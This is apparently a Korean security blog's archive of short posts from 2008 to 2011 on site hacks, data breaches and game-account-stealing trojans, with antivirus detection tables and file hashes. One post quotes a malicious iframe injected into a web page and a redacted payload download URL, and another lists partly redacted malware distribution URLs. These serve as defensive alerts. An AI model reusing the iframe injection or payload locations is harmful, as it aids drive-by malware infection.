태터데스크 관리자

도움말
닫기
적용하기   첫페이지 만들기

태터데스크 메시지

저장하였습니다.

인터넷세상2011.01.14 09:09


북한 홈페이지 해킹에 대한 북한의 공식 입장 내용이라는 사진이 인터넷에 올라와 있네요.

사용자 삽입 이미지


Posted by viruslab
TAG 북한, 해킹
보안관련소식2010.06.15 09:26
보안관련소식2010.06.10 10:32


아이패드 해킹 소식 보기
미국 AT&T 사이트 해킹 아이패드
사용자들의 개인정보 유출 사고 발생
news.mt.co.kr

미국 이통사인 AT&T 홈페이지가 해킹되어서 서버에 저장되어 있떤 Apple 아이패드 사용자들의 개인정보가 유출되었다고 합니다.

아이패드 구매자 11만 4천여명의 개인 이메일 주소가 노출된 것으로 알려졌네요.

아이패드 사용자들에게 광고 메일이 발송되는거 아닌가 모르겠습니다.
사용자 삽입 이미지



Posted by viruslab
보안관련소식2010.06.08 09:07


멕시코 국제공항 홈피 해킹
베니토 후아레스 국제공항 해킹
news.chosun.com

베티토 후아레스 국제공항 홈페이지가 지난 6일부터 정부를 비난하는 해커로부터 공격을 당해 이틀째 접속이 차단되고 있다고 하네요.

곧 검거 소식이 전해지겠죠.

사용자 삽입 이미지

Posted by viruslab
보안관련소식2010.06.03 10:13


아이디 4천 400만개 노출
유명 온라인 게임 계정정보 4천 400만개 노출
신속히 암호를 변경하세요.
www.zdnet.co.kr

시만텍의 악성코드 이름으로 Trojan.Loginck 라는 트로이목마가 이슈가 되고 있습니다.

현재 nProtect Anti-Virus 제품에서는 Trojan/W32.Agent.28160.LF 라는 진단명으로 진단/치료하고 있습니다.
주로 사용하는 암호는 정기적으로 복잡하게 변경하시면 외부의 잠재적 위협을 예방하는데 많은 도움이 될 수 있습니다.

바이러스 토탈 진단현황
nProtect Anti-Virus 진단 치료 가능
www.virustotal.com

a-squared 5.0.0.26 2010.06.02 Trojan.Msil!IK
AhnLab-V3 2010.06.02.00 2010.06.01 Win-Trojan/Loginck.28160
AntiVir 8.2.2.4 2010.06.02 TR/MSIL.Small.H
Antiy-AVL 2.0.3.7 2010.06.02 Trojan/MSIL.Small.gen
Authentium 5.2.0.5 2010.06.02 -
Avast 4.8.1351.0 2010.06.02 Win32:Malware-gen
Avast5 5.0.332.0 2010.06.02 Win32:Malware-gen
AVG 9.0.0.787 2010.06.02 Generic17.BYIM
BitDefender 7.2 2010.06.02 Trojan.Generic.3915841
CAT-QuickHeal 10.00 2010.06.02 Trojan.Agent.gen
ClamAV 0.96.0.3-git 2010.06.02 -
Comodo 4980 2010.06.01 TrojWare.MSIL.Small
DrWeb 5.0.2.03300 2010.06.02 -
eSafe 7.0.17.0 2010.06.01 -
eTrust-Vet 35.2.7524 2010.06.02 -
F-Prot 4.6.0.103 2010.06.02 -
F-Secure 9.0.15370.0 2010.06.02 Trojan.Generic.3915841
Fortinet 4.1.133.0 2010.06.01 W32/Small.H!tr
GData 21 2010.06.02 Trojan.Generic.3915841
Ikarus T3.1.1.84.0 2010.06.02 Trojan.Msil
Jiangmin 13.0.900 2010.06.02 -
Kaspersky 7.0.0.125 2010.06.02 Trojan.MSIL.Small.h
McAfee 5.400.0.1158 2010.06.02 Generic PWS.y!cpq
McAfee-GW-Edition 2010.1 2010.06.02 Generic PWS.y!cpq
Microsoft 1.5802 2010.06.02 PWS:Win32/OnLineGames
NOD32 5165 2010.06.02 MSIL/Loginck.A
Norman 6.04.12 2010.06.01 -
nProtect 2010-06-02.01 2010.06.02 Trojan/W32.Agent.28160.LF
Panda 10.0.2.7 2010.06.01 W32/Aliser.C
PCTools 7.0.3.5 2010.06.02 Trojan.Loginck
Prevx 3.0 2010.06.02 -
Rising 22.50.02.04 2010.06.02 -
Sophos 4.53.0 2010.06.02 -
Sunbelt 6390 2010.06.02 Trojan.Win32.Generic!BT
Symantec 20101.1.0.89 2010.06.02 Trojan.Loginck
TheHacker 6.5.2.0.291 2010.06.01 Trojan/Small.h
TrendMicro 9.120.0.1004 2010.06.02 TROJ_GEN.UAE201Z
TrendMicro-HouseCall 9.120.0.1004 2010.06.02 TROJ_GEN.UAE201Z
VBA32 3.12.12.5 2010.06.01 Trojan.MSIL.Small.h
ViRobot 2010.6.1.2333 2010.06.01 MSIL.S.Small.28160
VirusBuster 5.0.27.0 2010.06.01 Trojan.PWS.OnLineGames.BVDT

사용자 삽입 이미지

Posted by viruslab
보안관련소식2010.06.03 09:07


온라인 게임 계정 유출 4400만개
악성코드에 의한 유출로 알려져 있네요.
www.asiae.co.kr

사실 이 뉴스는 5월 28일에 이미 전해드린바 있습니다.
아래 내용 참고하시면 좋겠습니다.

http://viruslab.tistory.com/1801

사용자 삽입 이미지

해외서 온라인 게임 계정 정보 4400만개를 저장한 서버가 발견됐다. 이 서버를 구축한 해커는 장기간에 걸쳐 악성코드를 이용해 해당 정보를 취합하고, 이를 판매하기 위해 계정의 유효 여부를 확인하는 악성코드도 배포한 것으로 전해져 이용자들의 주의가 요망된다.

1일 보안업체 시만텍에 따르면 최근 4400만개의 온라인게임 계정 아이디와 비밀번호 등을 저장하고 있는 불법 서버가 발견됐다.

시만텍 측은 특정 악성코드에 대한 신고를 접수하고 이를 추적한 결과 이 서버를 발견했다고 기업 블로그를 통해 밝혔다.

이 서버에는 국내 게임업체의 계정 정보도 저장돼 있는 것으로 알려졌다. 이밖에도 '월드 오브 워크래프트', 중국 와이엔터테인먼트 계정 등 전세계에서 수집한 게임 계정 정보가 4400만개에 달한다는 것이 시만텍 측의 설명이다.



 

Posted by viruslab
보안관련소식2009.09.02 09:44
인터넷세상2009.08.24 09:37


http://www.zdnet.co.kr/Contents/2009/08/24/zdnet20090824084553.htm

토마토 가든 윈도우XP 를 개발하여 배포한 홍 레이가 3년 6개월의 중형이 선고되었네요.

http://www.tomatoleI.com/

사용자 삽입 이미지

아래는 실제 Tomato Garden 에디션의 화면입니다.

사용자 삽입 이미지



Posted by viruslab
신종악성코드정보2009.07.06 16:21


Win32.Loader.w 은 Rising Anti-Virus 의 진단명이다.
현재 해당 악성코드를 입수하여 파악 중에 있다.

실제 아이온 계정 탈취 목적의 트로이목마는 국내에서도 다수 발견되고 있는 실정이다.

아이온의 인기가 높아지면서 악성코드의 공격도 비례적으로 증가하고 있다.

http://www.dailygame.co.kr/news/all_news_view.daily?idx=12588

http://www.dailygame.co.kr/news/all_news_view.daily?idx=12666
http://news.nate.com/view/20090706n11375
http://aion.game518.com/news/bg/200907/04-85077.shtml
http://www.rising-global.com/Information/Daily-Virus-Report/Daily-Virus-Report-Jul-1-2009--Win32-Loader-w.html

사용자 삽입 이미지

사용자 삽입 이미지


Posted by viruslab
신종악성코드정보2009.06.17 13:24


공중파 방송국 뉴스 사이트에서 웹 취약점을 통해서 악성코드를 유포하고 있다.

사용자 삽입 이미지

생성되는 파일은 다음과 같다.

H.exe -> Main Dropper

AhnRpta.exe (정상 노트패드 파일)
cao110.dll
cao220.dll
e8main0.dll
zhido.exe


역시나 유명 온라인 게임 계정 탈취 기능을 수행하며, 국내외 유명 Anti-Virus 제품의 정상적인 사용을 방해한다.


Posted by viruslab
보안관련소식2009.06.02 11:17


연합뉴스에 의해서 보도화되었네요.

서울시 취업정보 사이트가 해킹당해 이 사이트에 등록된 8만여명의 가정환경, 성격, 학력 등 극히 민감한 개인 신상정보가 외부로 유출돼 충격을 주고 있다.

2일 서울시에 따르면 시가 올해 1월 개설해 운영하고 있는 취업정보 사이트인 `서울일자리플러스센터'(http://job.seoul.go.kr)가 지난달 8일부터 10일까지 3일간 해킹당했다.



사용자 삽입 이미지


Posted by viruslab
신종악성코드정보2009.05.30 14:19


국내의 몇 개의 미디어 사이트에 접속시 보안 취약점을 통해서 악성코드가 유포되고 있어, 주의가 필요하다.

사용자 삽입 이미지

최종적으로 설치가 유도되는 트로이목마의 파일명은 svchost.exe 이다.

nProtect 진단명은 Trojan/W32.Agent.28672.MZ 이다.

안티바이러스 엔진 버전 정의 날짜 검사 결과
a-squared 4.0.0.101 2009.05.30 Trojan-PWS.Win32.QQPass!IK
AhnLab-V3 5.0.0.2 2009.05.29 -
AntiVir 7.9.0.180 2009.05.29 TR/Spy.Gen
Antiy-AVL 2.0.3.1 2009.05.27 -
Authentium 5.1.2.4 2009.05.29 W32/Agent.S.gen!Eldorado
Avast 4.8.1335.0 2009.05.29 -
AVG 8.5.0.339 2009.05.29 -
BitDefender 7.2 2009.05.30 GenPack:Generic.Malware.Fdldg.4D8731CC
CAT-QuickHeal 10.00 2009.05.29 -
ClamAV 0.94.1 2009.05.30 -
Comodo 1215 2009.05.29 -
DrWeb 5.0.0.12182 2009.05.29 DLOADER.Trojan
eSafe 7.0.17.0 2009.05.27 -
eTrust-Vet 31.6.6530 2009.05.30 -
F-Prot 4.4.4.56 2009.05.29 W32/Agent.S.gen!Eldorado
F-Secure 8.0.14470.0 2009.05.29 W32/Malware
Fortinet 3.117.0.0 2009.05.30 -
GData 19 2009.05.30 -
Ikarus T3.1.1.57.0 2009.05.30 -
K7AntiVirus 7.10.749 2009.05.29 -
Kaspersky 7.0.0.125 2009.05.30 -
McAfee 5630 2009.05.29 -
McAfee+Artemis 5630 2009.05.29 -
McAfee-GW-Edition 6.7.6 2009.05.29 Trojan.Spy.Gen
Microsoft 1.4701 2009.05.29 -
NOD32 4116 2009.05.29 -
Norman 6.01.05 2009.05.29 -
nProtect 2009.1.8.0 2009.05.30 Trojan/W32.Agent.28672.MZ
Panda 10.0.0.14 2009.05.30 Suspicious file
PCTools 4.4.2.0 2009.05.29 -
Prevx 3.0 2009.05.30 -
Rising 21.31.21.00 2009.05.27 Trojan.Win32.Nodef.apo
Sophos 4.42.0 2009.05.30 -
Sunbelt 3.2.1858.2 2009.05.30 -
Symantec 1.4.4.12 2009.05.30 -
TheHacker 6.3.4.3.334 2009.05.29 -
TrendMicro 8.950.0.1092 2009.05.29 -
VBA32 3.12.10.6 2009.05.27 MalwareScope.Trojan-PSW.Game.16
ViRobot 2009.5.29.1761 2009.05.29 Trojan.Win32.PSWIGames.28672.NA
VirusBuster 4.6.5.0 2009.05.29 -
추가 정보
File size: 28672 bytes
MD5...: 656a760877d39e86b917c3c20a77c0fd
SHA1..: c995d7282dd2d1e4daa1ea078ccf86f411ab0e78
SHA256: 298f4fb1b66138e37bb34a9fba3a3b7d09cb901e95e82f13d011e092b544787d






Posted by viruslab
신종악성코드정보2009.05.23 14:51


메인 페이지에 악의적인 아이프레임이 삽입되어 있다.

<iframe src=http://203.(생략).117/index.htm width=100 height=0></iframe></a>
   

index.htm 파일에는 Multiple Exploit Code 가 포함되어 있다.


일부 PC에서는 다음과 같은 오류창이 나타날 수 있다.


- old.js
- flash.htm
- IE7.htm
- 06014.htm
- real.htm
- new1.htm
- ac.htm

Exploit Code 들에 의해서 중국사이트에 숨겨져 있는 svchost.exe 파일이 설치시도 된다.

http://down.(생략).org/svchost.exe

svchost.exe 파일이 실행되면 다음과 같은 파일이 생성된다.

C:\Windows\System32\korean.dll
C:\Windows\System32\msdconf.exe

korean.dll 파일은 다음과 같은 온라인 게임의 주요 모듈 사용자의 정보 탈취를 시도한다.

MAPLESTORY.EXE
DNF.EXE
GAMELAUNCHER.EXE



Posted by viruslab
보안관련소식2008.03.03 09:43


지난 주는 3.1절이 포함되어 있는 주말이었는데, 토요일과 일요일부터 국내의 여러 웹 사이트가 해킹되어 새로운 악성코드를 유포하는 경유지로 악용되고 있다. 물론 평상 시에도 다량으로 뿌리는 경우가 많다.

월요일 오전까지도 지속적으로 유포되고 있으니 조심해야 겠다.

대표적으로 다음과 같은 취약점을 이용하고 있다.

MS06-014
Real Player Exploit
JetAudio Exploit

http://www.[제거]/fileupload/1313.exe
http://test.[제거]/dog.exe
http://121.[제거]130/H.EXE
http://www.[제거]/pic/ok.hlp
http://211.110.[제거]/smtpsnap.jpg
http://unsu[제거]/6/6/dm.exe
http://www.[제거]/Gonggu/Image/graph.exe

현재 가장 많은 곳에서 배포되는 것으로 보여지는 파일은 1313.exe 로 국내 유명 온라인 게임 사용자의 계정 탈취용 트로이목마로 확인되었다.

[대상 게임]
바람의 나라
메이플 스토리
던전 앤 파이터
한게임 등

사용자들은 최신 보안패치를 설치하면 해당 Exploit Code 로 부터 안전할 수 있으며, 최신 백신프로그램을 유지하고 실시간 감시를 활성화 해 두는 것이 필요하다.
Posted by viruslab
보안관련소식2008.02.25 09:26


http://news.kbs.co.kr/article/economic/200802/20080224/1515188.html

사용자 삽입 이미지
<앵커 멘트>

국민은행의 인터넷 뱅킹 이용자들이 7천만원을 해킹당한 사실이 KBS 단독 취재결과 밝혀졌습니다.

엉뚱한 곳에 돈을 보낼 수 있게하는 바이러스에 국내 PC 2천여 대가 감염된 것으로 알려졌습니다.

민경욱 기자입니다.

<리포트>

자신의 통장에서 엉뚱한 사람의 계좌로 8백만 원이 송금된 사실을 알아차린 주부 이순화 씨.

곧바로 은행에 신고했지만 돌아온 건 면박성의 의심섞인 질문 뿐이었습니다.

<인터뷰>이순화 (인터넷 뱅킹 해킹 피해자): "아줌마가 보내놓고 기억 못하는 게 아니냐. 다시 한 번 생각해보라고 했거든요. 그런데 80원도 아니고 8백만 원을 이틀 사이에 기억 못할 리는 없잖아요."

역시 하루 아침에 천7백만 원이 통장에서 빠져나간 배두열 씨.

경찰에 신고했지만 이른바 대포통장으로 송금된 돈은 벌써 사라진 뒤였습니다.

<인터뷰> 배두열 (인터넷 뱅킹 해킹 피해자): "최종 찾는 거는 몇 십만 원씩 수십 군데에서 찾아버리니까, 그런데 경찰이 현실적으로 수십 군데를 다 찾기는 힘들잖아요."

지금까지 개인의 금융정보가 유출된 것으로 확인된 피해자는 12명, 이 가운데 4명의 인터넷 뱅킹 계좌에서 모두 7천만 원이 인출됐습니다.

경찰은 지난해 8월 쯤 인터넷 포털 사이트를 통해 바이러스를 퍼뜨린 해커가 보안카드의 정보를 모아 조직적인 예금 인출을 시도하고 있는 것으로 보고 있습니다.

중국에 있는 IP 주소의 해킹 용의자들은 멀드롭 형태의 바이러스에 감염된 국내 PC의 정보를 외국에 있는 서버로 자동 전송시키는 방법으로 예금 인출에 필요한 정보를 얻어왔던 것으로 전해졌습니다.

<인터뷰> 박성찬(인터넷 뱅킹 해킹 피해자): "랜 카드에서 뭐가 계속 나가더라고요, 데이터가. 그것은 해킹에 의한 바이러스의 일종인 것 같기도 하고, 계속 거기서 데이터가 날아가는 거예요."

금융계와 보안업계는 키보드 해킹 방지프로그램을 업그레이드 시키는 등 자체적인 조처를 취하고 있지만 해킹 사실 자체에 대해서는 입을 다물고 있습니다.

<인터뷰> 김용원(국민은행 IT 기획부장): "순수하게 고객 PC를 완벽하게 해킹 해 가지고 그걸 가지고 인터넷 뱅킹에 성공한 케이스는 현재까진 없어요."

금융감독원도 오는 4월부터 각 은행에 대해 보안 등급을 강화하라는 공문을 내려보냈지만 보안카드를 대신해 사용을 의무화 한 OTP도 해킹에 취약성을 보이는 등 하루 18조원이 거래되는 인터넷 뱅킹의 보안이 시험대에 올랐습니다.

KBS 뉴스 민경욱입니다.

Posted by viruslab